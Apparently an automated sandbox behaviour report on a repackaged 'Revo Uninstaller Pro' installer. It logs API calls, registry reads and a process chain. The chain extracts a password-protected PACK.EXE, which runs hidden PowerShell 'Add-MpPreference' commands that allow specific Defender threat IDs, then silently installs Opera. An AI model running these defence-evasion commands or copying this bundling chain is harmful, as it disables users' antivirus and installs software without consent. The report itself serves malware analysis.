      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeCode function: 26_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,26_2_00403665
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00404B12 GetDlgItem,SetWindowTextW,SHAutoComplete,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceExW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404B12
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_004021CF CoCreateInstance,0_2_004021CF
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FE963A FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,16_2_00FE963A
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo GroupJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Users\user\Desktop\Revo Uninstaller Pro.lnkJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Opera/Installer/C:/Users/user/AppData/Local/Programs/Opera
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeMutant created: \Sessions\1\BaseNamedObjects\Local\RevoUninstallerPro}
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1344:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5012:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Users\user\AppData\Local\Temp\nsn5EB7.tmpJump to behavior
      Source: Yara matchFile source: 10.0.ruplp.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0000000A.00000000.2096953602.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECommand line argument: sfxname16_2_00FECBB8
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECommand line argument: sfxstime16_2_00FECBB8
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECommand line argument: STARTDLG16_2_00FECBB8
      Source: Revo.Uninstaller.Pro.v5.3.4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Windows\System32\rundll32.exe RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile read: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe "C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe"
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Windows\System32\rundll32.exe RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\runonce.exe "C:\Windows\system32\runonce.exe" -r
      Source: C:\Windows\System32\runonce.exeProcess created: C:\Windows\System32\grpconv.exe "C:\Windows\System32\grpconv.exe" -o
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll"
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c "C:\Users\user\AppData\Local\Temp\PACK.EXE" -p123
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\PACK.EXE C:\Users\user\AppData\Local\Temp\PACK.EXE -p123
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe"
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeProcess created: C:\Users\user\Downloads\OperaSetup.exe "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0
      Source: C:\Users\user\Downloads\OperaSetup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --silent --allusers=0 --server-tracking-blob=NjAxODRkYTk2NmVjNjFhZDRjZmFkOGU5NDAyOGEwYWNlYzViZGE5ZjVkYTg0YmUwMzJiZDRjZWFjZGQ4ODM0Njp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249cjEwIiwidGltZXN0YW1wIjoiMTczMzc2MzI0Mi4yNjIyIiwidXNlcmFnZW50IjoiTlNJU19JbmV0YyAoTW96aWxsYSkiLCJ1dG0iOnsiY2FtcGFpZ24iOiJyMTAiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJEV05MU1QifSwidXVpZCI6ImNkOWY4MWM2LTcyOWEtNGQ5NS1hYzcxLTFlYmJhNzViZmM3YiJ9
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6c2f7cf4,0x6c2f7d00,0x6c2f7d0c
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe "C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=8040 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209115409" --session-guid=57f4b7c1-1875-4c3d-aada-fe1e595f9b71 --server-tracking-blob="ZTEzMzE3M2U4ODhkN2Y3YmE0ODQ3NmYwNmNlNmJmMDE4NmY4MzAzYmNmNWRmMWYyYmVlYWJmNDExZjE1ZDAzODp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249cjEwIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzMzNzYzMjQyLjI2MjIiLCJ1c2VyYWdlbnQiOiJOU0lTX0luZXRjIChNb3ppbGxhKSIsInV0bSI6eyJjYW1wYWlnbiI6InIxMCIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6IkRXTkxTVCJ9LCJ1dWlkIjoiY2Q5ZjgxYzYtNzI5YS00ZDk1LWFjNzEtMWViYmE3NWJmYzdiIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=1806000000000000
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x31c,0x320,0x330,0x2f8,0x334,0x6b717cf4,0x6b717d00,0x6b717d0c
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Windows\System32\rundll32.exe RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.infJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll"Jump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bcJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECTJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c "C:\Users\user\AppData\Local\Temp\PACK.EXE" -p123Jump to behavior
      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\runonce.exe "C:\Windows\system32\runonce.exe" -rJump to behavior
      Source: C:\Windows\System32\runonce.exeProcess created: C:\Windows\System32\grpconv.exe "C:\Windows\System32\grpconv.exe" -oJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\PACK.EXE C:\Users\user\AppData\Local\Temp\PACK.EXE -p123
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force"
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force"
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force"
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe"
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeProcess created: C:\Users\user\Downloads\OperaSetup.exe "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0
      Source: C:\Users\user\Downloads\OperaSetup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --silent --allusers=0 --server-tracking-blob=NjAxODRkYTk2NmVjNjFhZDRjZmFkOGU5NDAyOGEwYWNlYzViZGE5ZjVkYTg0YmUwMzJiZDRjZWFjZGQ4ODM0Njp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249cjEwIiwidGltZXN0YW1wIjoiMTczMzc2MzI0Mi4yNjIyIiwidXNlcmFnZW50IjoiTlNJU19JbmV0YyAoTW96aWxsYSkiLCJ1dG0iOnsiY2FtcGFpZ24iOiJyMTAiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJEV05MU1QifSwidXVpZCI6ImNkOWY4MWM2LTcyOWEtNGQ5NS1hYzcxLTFlYmJhNzViZmM3YiJ9
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6c2f7cf4,0x6c2f7d00,0x6c2f7d0c
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe "C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=8040 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209115409" --session-guid=57f4b7c1-1875-4c3d-aada-fe1e595f9b71 --server-tracking-blob="ZTEzMzE3M2U4ODhkN2Y3YmE0ODQ3NmYwNmNlNmJmMDE4NmY4MzAzYmNmNWRmMWYyYmVlYWJmNDExZjE1ZDAzODp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249cjEwIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzMzNzYzMjQyLjI2MjIiLCJ1c2VyYWdlbnQiOiJOU0lTX0luZXRjIChNb3ppbGxhKSIsInV0bSI6eyJjYW1wYWlnbiI6InIxMCIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6IkRXTkxTVCJ9LCJ1dWlkIjoiY2Q5ZjgxYzYtNzI5YS00ZDk1LWFjNzEtMWViYmE3NWJmYzdiIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=1806000000000000
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x31c,0x320,0x330,0x2f8,0x334,0x6b717cf4,0x6b717d00,0x6b717d0c
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: winnsi.dllJump to behavior
